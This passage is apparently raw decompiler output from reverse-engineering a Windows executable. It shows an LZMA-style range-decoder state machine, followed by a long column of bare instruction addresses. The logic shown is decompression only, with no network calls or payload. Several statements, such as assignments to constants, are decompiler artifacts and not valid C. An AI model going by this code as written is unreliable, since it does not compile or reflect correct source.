												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406665
                                                                                                                          0x00406669
                                                                                                                          0x00406818
                                                                                                                          0x0040682e
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x0040683f
                                                                                                                          0x00406846
                                                                                                                          0x0040684a
                                                                                                                          0x0040684a
                                                                                                                          0x00406675
                                                                                                                          0x0040667c
                                                                                                                          0x00406684
                                                                                                                          0x00406687
                                                                                                                          0x0040668a
                                                                                                                          0x0040668a
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e35
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00000000
                                                                                                                          0x00405e46
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e4f
                                                                                                                          0x00405e52
                                                                                                                          0x00405e55
                                                                                                                          0x00405e59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e5f
                                                                                                                          0x00405e62
                                                                                                                          0x00405e64
                                                                                                                          0x00405e65
                                                                                                                          0x00405e68
                                                                                                                          0x00405e6a
                                                                                                                          0x00405e6b
                                                                                                                          0x00405e6d
                                                                                                                          0x00405e70
                                                                                                                          0x00405e75
                                                                                                                          0x00405e7a
                                                                                                                          0x00405e83
                                                                                                                          0x00405e96
                                                                                                                          0x00405e99
                                                                                                                          0x00405ea5
                                                                                                                          0x00405ecd
                                                                                                                          0x00405ecf
                                                                                                                          0x00405edd
                                                                                                                          0x00405edd
                                                                                                                          0x00405ee1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed4
                                                                                                                          0x00405ed5
                                                                                                                          0x00405ed5
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405eab
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb9
                                                                                                                          0x00405ec1
                                                                                                                          0x00405ec4
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405ee7
                                                                                                                          0x00405ee7
                                                                                                                          0x00405eeb
                                                                                                                          0x00406797
                                                                                                                          0x00000000
                                                                                                                          0x00406797
                                                                                                                          0x00405ef4
                                                                                                                          0x00405f04
                                                                                                                          0x00405f07
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0d
                                                                                                                          0x00405f11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f13
                                                                                                                          0x00405f19
                                                                                                                          0x00405f43
                                                                                                                          0x00405f49
                                                                                                                          0x00405f50
                                                                                                                          0x00000000
                                                                                                                          0x00405f50
                                                                                                                          0x00405f1f
                                                                                                                          0x00405f22
                                                                                                                          0x00405f27
                                                                                                                          0x00405f27
                                                                                                                          0x00405f32
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f82
                                                                                                                          0x00405f88
                                                                                                                          0x00405f8b
                                                                                                                          0x00405f98
                                                                                                                          0x00405fa0
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f57
                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x004063a6
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063b2
                                                                                                                          0x004063b9
                                                                                                                          0x004063be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406063
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x00406069
                                                                                                                          0x0040606c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060a9
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060d8
                                                                                                                          0x004060dc
                                                                                                                          0x004060de
                                                                                                                          0x004060e2
                                                                                                                          0x004060ae
                                                                                                                          0x004060ae
                                                                                                                          0x004060b2
                                                                                                                          0x004060ba
                                                                                                                          0x004060bf
                                                                                                                          0x004060c1
                                                                                                                          0x004060c3
                                                                                                                          0x004060c3
                                                                                                                          0x004060e5
                                                                                                                          0x004060ec
                                                                                                                          0x004060ef
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060fa
                                                                                                                          0x004060fa
                                                                                                                          0x004060fe
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x00406104
                                                                                                                          0x00406107
                                                                                                                          0x0040610a
                                                                                                                          0x0040610e
                                                                                                                          0x00406111
